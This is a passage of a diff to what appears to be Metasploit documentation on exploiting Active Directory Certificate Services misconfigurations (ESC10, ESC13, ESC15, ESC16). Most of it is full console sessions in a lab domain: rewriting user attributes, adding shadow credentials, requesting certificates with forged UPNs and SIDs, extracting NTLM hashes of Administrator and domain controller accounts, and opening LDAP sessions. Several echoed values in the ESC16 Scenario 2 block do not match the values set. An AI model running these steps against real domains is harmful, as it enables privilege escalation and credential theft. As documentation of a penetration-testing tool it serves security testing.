+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717141705_default_172.16.199.200_mit.kerberos.cca_132784.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for Test2$@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717141705_default_172.16.199.200_mit.kerberos.cca_364943.bin
+[+] Found NTLM hash for Test2$: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 - Certificate DNS: dc2.kerberos.issue
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250717141706_default_172.16.199.200_windows.ad.cs_369517.pfx
+[*] 172.16.199.200:445 - reverting ldap object
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[+] Deleted entry with device ID 517757a2-5174-5c43-6005-102c4429ff05
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Attempting to delete attribute dNSHostName from CN=Test2,CN=Computers,DC=kerberos,DC=issue...
+[+] Successfully deleted attribute dNSHostName from CN=Test2,CN=Computers,DC=kerberos,DC=issue
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=172.16.199.200 cert_file=/Users/jheysel/.msf4/loot/20250717141706_default_172.16.199.200_windows.ad.cs_369517.pfx
+[*] Running module against 172.16.199.200
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717142328_default_172.16.199.200_mit.kerberos.cca_370847.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for dc2$@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717142328_default_172.16.199.200_mit.kerberos.cca_596103.bin
+[+] Found NTLM hash for dc2$: aad3b435b51404eeaad3b435b51404ee:cceede79c156a295f45e7ad38ee2f884
+[*] Auxiliary module execution completed
+```
+
+# Exploiting ESC10
+## ESC10 Scenario 1
+Pre-requisites:
+- `StrongCertificateBindingEnforcement` is set to `0`
+- Because the above is set to `0` we don't need the `CT_FLAG_NO_SECURITY_EXTENSION` flag set on the vulnerable template
+- Other than the above, pre-requisites and exploitation are the exact same as ESC9 Scenario 1
+
+## ESC10 Scenario 2
+Pre-requisites: 
+- `CertificateMappingMethods` is set to `0x0004` (UPN certificate mapping) or `0x001F` (All of the above values)
+- The vulnerable template has the `SubjectAltRequireUPN` set
+- The same vulnerable template has a client authentication EKU
+- We have credentials of a machine account who has `GenericWrite` privileges over another machine account that can enroll in the vulnerable template
+
+In this scenario we can only compromise accounts that do not already have a populated `userPrincipalName` attribute, such as machine accounts and the default domain administrator.
+In addition, because this registry key only applies to SChannel authentication we are forced to authenticate to LDAPS once we get a certificate.
+
+```
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldaprport 389
+ldaprport => 389
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username "user2"
+target_username => user2
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT_VALUE 'DC2$@kerberos.issue'
+UPDATE_LDAP_OBJECT_VALUE => DC2$@kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT userPrincipalName
+UPDATE_LDAP_OBJECT => userPrincipalName
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set CA kerberos-DC2-CA
+CA => kerberos-DC2-CA
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set CERT_TEMPLATE ESC10-Template
+CERT_TEMPLATE => ESC10-Template
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapusername user1
+ldapusername => user1
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: user2
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to DC2$@kerberos.issue...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to DC2$@kerberos.issue
+[+] The operation completed successfully!
+[*] 172.16.199.200:445 - Adding shadow credentials for user2
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20250717143323_default_172.16.199.200_windows.ad.cs_860225.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 825a1a2f-336f-e41c-24fb-703bb79f79f9
+[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
+[*] 172.16.199.200:445 - Getting hash for user2
+[!] Warning: Provided principal and realm (user2@kerberos.issue) do not match entries in certificate:
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717143323_default_172.16.199.200_mit.kerberos.cca_872380.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for user2@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717143323_default_172.16.199.200_mit.kerberos.cca_123025.bin
+[+] Found NTLM hash for user2: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.1 (Server Authentication)
+[*] 172.16.199.200:445 -   * 1.3.6.1.4.1.311.20.2.2 (Smart Card Logon)
+[*] 172.16.199.200:445 - Certificate UPN: DC2$@kerberos.issue
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250717143324_default_172.16.199.200_windows.ad.cs_752634.pfx
+[*] 172.16.199.200:445 - reverting ldap object
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[+] Deleted entry with device ID 825a1a2f-336f-e41c-24fb-703bb79f79f9
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: DC2$@kerberos.issue
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to user2...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to user2
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > use ldap_login
+[*] Using auxiliary/scanner/ldap/ldap_login
+[*] The CreateSession option within this module can open an interactive session
+
+msf6 auxiliary(scanner/ldap/ldap_login) > run ssl=true rhosts=172.16.199.200 LDAP::Auth=schannel LDAP::CertFile=/Users/jheysel/.msf4/loot/20250717143324_default_172.16.199.200_windows.ad.cs_752634.pfx
+[+] Success: 'Cert File /Users/jheysel/.msf4/loot/20250717143324_default_172.16.199.200_windows.ad.cs_752634.pfx'
+[*] LDAP session 1 opened (172.16.199.1:58674 -> 172.16.199.200:389) at 2025-07-17 14:35:08 -0700
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Bruteforce completed, 1 credential was successful.
+[*] 1 LDAP session was opened successfully.
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/ldap/ldap_login) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type  Information                     Connection
+  --  ----  ----  -----------                     ----------
+  1         ldap  LDAP DC2$ @ 172.16.199.200:389  172.16.199.1:58674 -> 172.16.199.200:389 (172.16.199.200)
+
+```
+
 # Exploiting ESC13
 To exploit ESC13, we need to target a certificate that has an issuance policy linked to a universal group in Active
 Directory. Unlike some of the other ESC techniques, successfully exploiting ESC13 isn't necessarily guaranteed to yield
@@ -931,7 +1327,7 @@ permissions will be included in the resulting Kerberos ticket in the notes secti
 ESC13-Test template is vulnerable to ESC13 and will yield a ticket including the ESC13-Group permissions.

 ```
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
+msf auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
 ...
 [+] Template: ESC13-Test
 [*]   Distinguished Name: CN=ESC13-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
@@ -954,20 +1350,20 @@ In this case, the ticket can be issued with the `icpr_cert` module. No additiona
 certificate beyond the standard `CA`, `CERT_TEMPLATE`, target and authentication options.

 ```
-msf6 > use auxiliary/admin/dcerpc/icpr_cert 
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+msf > use auxiliary/admin/dcerpc/icpr_cert 
+msf auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
 SMBUser => normaluser
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
 SMBDomain => COLLALABS1
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
 SMBPass => normalpass
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
+msf auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
 CA => collalabs1-SRV-ADDS01-CA
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC13-Test
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC13-Test
 CERT_TEMPLATE => ESC13-Test
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 172.30.239.85

 [+] 172.30.239.85:445 - The requested certificate was issued.
@@ -976,7 +1372,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 172.30.239.85:445 - Certificate UPN: normaluser@collalabs1.local
 [*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20240226170310_default_172.30.239.85_windows.ad.cs_917878.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) with the `ESC13-Group`
@@ -993,25 +1389,25 @@ used for authentication to LDAP via SCHANNEL. The operator can then perform LDAP
 specified in the alternate UPN.

 ```msf
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+msf auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
 SMBUser => normaluser
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
 SMBDomain => COLLALABS1
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
 SMBPass => normalpass
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
+msf auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
 CA => collalabs1-SRV-ADDS01-CA
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC15-Test
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC15-Test
 CERT_TEMPLATE => ESC15-Test
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ADD_CERT_APP_POLICY 1.3.6.1.5.5.7.3.2
+msf auxiliary(admin/dcerpc/icpr_cert) > set ADD_CERT_APP_POLICY 1.3.6.1.5.5.7.3.2
 ADD_CERT_APP_POLICY => 1.3.6.1.5.5.7.3.2
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN administrator@collalabs1.local
+msf auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN administrator@collalabs1.local
 ALT_UPN => administrator@collalabs1.local
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
+msf auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
 ALT_SID => S-1-5-21-3402587289-1488798532-3618296993-1000
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 172.30.239.85

 [*] 172.30.239.85:445 - Requesting a certificate...
@@ -1021,7 +1417,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 172.30.239.85:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
 [*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009171337_default_172.30.239.85_windows.ad.cs_089081.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 Certificates issued using this technique are not directly able to be used for Kerberos authentication via PKINIT.
@@ -1029,21 +1425,21 @@ However, the attack can be modified by adding the Certificate Request Agent OID
 certificate that can issue additional certificates in a manner similar to ESC2 which are compatible with PKINIT.

 ```msf
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+msf auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
 SMBUser => normaluser
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
 SMBDomain => COLLALABS1
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
 SMBPass => normalpass
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
+msf auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
 CA => collalabs1-SRV-ADDS01-CA
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC15-Test
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC15-Test
 CERT_TEMPLATE => ESC15-Test
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ADD_CERT_APP_POLICY 1.3.6.1.4.1.311.20.2.1
+msf auxiliary(admin/dcerpc/icpr_cert) > set ADD_CERT_APP_POLICY 1.3.6.1.4.1.311.20.2.1
 ADD_CERT_APP_POLICY => 1.3.6.1.4.1.311.20.2.1
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 172.30.239.85

 [*] 172.30.239.85:445 - Requesting a certificate...
@@ -1053,24 +1449,24 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 172.30.239.85:445 -   * 1.3.6.1.4.1.311.20.2.1 (Certificate Request Agent)
 [*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 Next, the certificate is used in conjunction with the `PFX` and `ON_BEHALF_OF` options to issue a certificate compatible
 with Kerberos as the privileged user (previously `ALT_UPN`).

 ```
-msf6 auxiliary(admin/dcerpc/icpr_cert) > unset ADD_CERT_APP_POLICY 
+msf auxiliary(admin/dcerpc/icpr_cert) > unset ADD_CERT_APP_POLICY 
 Unsetting ADD_CERT_APP_POLICY...
-msf6 auxiliary(admin/dcerpc/icpr_cert) > unset ALT_UPN 
+msf auxiliary(admin/dcerpc/icpr_cert) > unset ALT_UPN 
 Unsetting ALT_UPN...
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
 CERT_TEMPLATE => User
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF COLLALABS1\\administrator
+msf auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF COLLALABS1\\administrator
 ON_BEHALF_OF => COLLALABS1\\administrator
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx
+msf auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx
 PFX => /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 172.30.239.85

 [*] 172.30.239.85:445 - Requesting a certificate...
@@ -1079,11 +1475,173 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 172.30.239.85:445 - Certificate UPN: administrator@collalabs1.local
 [*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009172817_default_172.30.239.85_windows.ad.cs_427087.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 Finally, *this* certificate can be used to authenticate to Kerberos with the `kerberos/get_ticket` module.

+# Exploiting ESC16
+ESC16 refers to a CA-level misconfiguration where the SID security extension (OID `1.3.6.1.4.1.311.25.2`), introduced in
+the May 2022 KB5014754 update, is globally disabled. This extension allows domain controllers to securely map
+certificates to user or computer SIDs for strong authentication.
+
+When this OID is listed under the CA’s `DisableExtensionList` registry key, which is located:
+`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA-Name>\PolicyModules\<PolicyModuleName>\`
+all certificates issued by the CA will lack the SID binding, making every template behave as though it has the 
+`CT_FLAG_NO_SECURITY_EXTENSION` flag (essentially ESC9). After updating the `DisableExtensionList` the machine will need
+to be restarted for the changes to take effect. The `DisableExtensionList` under the default policy can be updated in
+order to exploit (a new policy is not required).
+
+## ESC16 Scenario 1
+If domain controllers aren’t in Full Enforcement mode (`StrongCertificateBindingEnforcement` != 2), they fall back to
+weaker mapping methods like UPN or DNS from the certificate’s SAN potentially reintroducing risks similar to the
+Certifried vulnerability (CVE-2022-26923) or ESC9 however for our purposes given the `DisableExtensionList` is called 
+"ESC16 Scenario 1". The way you exploit ESC16 scenario 1 with Metasploit is identical to how you would exploit ESC9:
+
+```
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldaprport 389
+ldaprport => 389
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set target_username user2
+target_username => user2
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapdomain kerberos.issue
+ldapdomain => kerberos.issue
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldappassword N0tpassword!
+ldappassword => N0tpassword!
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ldapusername user1
+ldapusername => user1
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set UPDATE_LDAP_OBJECT_VALUE Administrator
+UPDATE_LDAP_OBJECT_VALUE => Administrator
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set ca kerberos-dc2-ca
+ca => kerberos-dc2-ca
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set cert_template ESC16-Template
+cert_template => ESC16-Template
+msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: user2
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[*] 172.16.199.200:445 - Adding shadow credentials for user2
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[*] Certificate stored at: /Users/jheysel/.msf4/loot/20250717152132_default_172.16.199.200_windows.ad.cs_473934.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 0d055983-7921-797a-529e-259b4b7542a2
+[*] 172.16.199.200:445 - Loading admin/kerberos/get_ticket
+[*] 172.16.199.200:445 - Getting hash for user2
+[!] Warning: Provided principal and realm (user2@kerberos.issue) do not match entries in certificate:
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717152132_default_172.16.199.200_mit.kerberos.cca_930617.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for user2@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717152132_default_172.16.199.200_mit.kerberos.cca_355422.bin
+[+] Found NTLM hash for user2: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 - Certificate UPN: Administrator
+[*] 172.16.199.200:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20250717152134_default_172.16.199.200_windows.ad.cs_383174.pfx
+[*] 172.16.199.200:445 - reverting ldap object
+[*] 172.16.199.200:445 - Loading admin/ldap/shadow_credentials
+[*] 172.16.199.200:445 - Running admin/ldap/shadow_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Discovering base DN automatically
+[*] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
+[+] Deleted entry with device ID 0d055983-7921-797a-529e-259b4b7542a2
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName: Administrator
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to user2...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to user2
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+```
+
+With the certificate issued, the attacker can then use the `kerberos/get_ticket` module to obtain the hash of the admin user:
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhost=172.16.199.200 cert_file=//Users/jheysel/.msf4/loot/20250717152134_default_172.16.199.200_windows.ad.cs_383174.pfx username=Administrator domain=kerberos.issue
+[*] Running module against 172.16.199.200
+[!] Warning: Provided principal and realm (Administrator@kerberos.issue) do not match entries in certificate:
+[!]   * Administrator@
+[+] 172.16.199.200:88 - Received a valid TGT-Response
+[*] 172.16.199.200:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717152325_default_172.16.199.200_mit.kerberos.cca_344926.bin
+[*] 172.16.199.200:88 - Getting NTLM hash for Administrator@kerberos.issue
+[+] 172.16.199.200:88 - Received a valid TGS-Response
+[*] 172.16.199.200:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20250717152325_default_172.16.199.200_mit.kerberos.cca_598018.bin
+[+] Found NTLM hash for Administrator: aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f
+[*] Auxiliary module execution completed
+```
+
+#### ESC16 Scenario 2
+If domain controllers are in Full Enforcement mode (`StrongCertificateBindingEnforcement` == 2), ESC16 alone would normally
+prevent authentication using certificates that lack the required SID extension. However, if the CA is also vulnerable
+to ESC6, which is defined as: `EDITF_ATTRIBUTESUBJECTALTNAME2` flag is set under it's `EditFlags` registry key, located here:
+`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA-Name>\PolicyModules\<PolicyModuleName>\`
+then the CA accepts arbitrary SAN values from certificate request attribute and an attacker can still bypass strong
+certificate mapping.
+
+In this case, the attacker requests a certificate from the ESC16-affected CA using any client authentication template
+(like "User"), which ensures the SID security extension is omitted. At the same time, they exploit the ESC6 weakness to
+inject a custom Subject Alternative Name that includes both a forged UPN and a specially crafted SID value using the format:
+`URI:tag:microsoft.com,2022-09-14:sid:<SID>`. This format was introduced in the May 2022 KB5014754 update and
+intended to help support strong certificate mappings between the user SID and the certificate.
+
+Because the certificate lacks the official SID extension (due to ESC16) but includes a valid-looking SAN SID URI
+(via ESC6), the domain controller accepts it and maps the certificate using the supplied SID—even in Full Enforcement mode.
+
+The way you would exploit ESC16 Scenario 2 with Metasploit is different than Scenario 1 as we don't need to update
+any LDAP objects, and so we can use the `icpr_cert` module to request a certificate. 
+```
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set alt_sid S-1-5-21-2324486357-3075865580-3606784161-500
+alt_sid => S-1-5-21-1655260159-4293876351-2321352318-500
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set alt_upn Administrator@kerberos.issue
+alt_upn => Administrator@msf.local
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set ca kerberos-DC2-CA
+ca => msf-DC3-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set cert_template User
+cert_template => User
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set RHOSTS 172.16.199.200
+RHOSTS => 172.16.199.130
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set smbdomain kerberos.issue
+smbdomain => msf.local
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set smbpass N0tpassword!
+smbpass => N0tpassword!
+msf6 auxiliary(admin/dcerpc/icpr_cert) >  set smbuser user1
+smbuser => user1
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.16.199.200
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.16.199.200:445 -   * 1.3.6.1.5.5.7.3.4 (Secure Email)
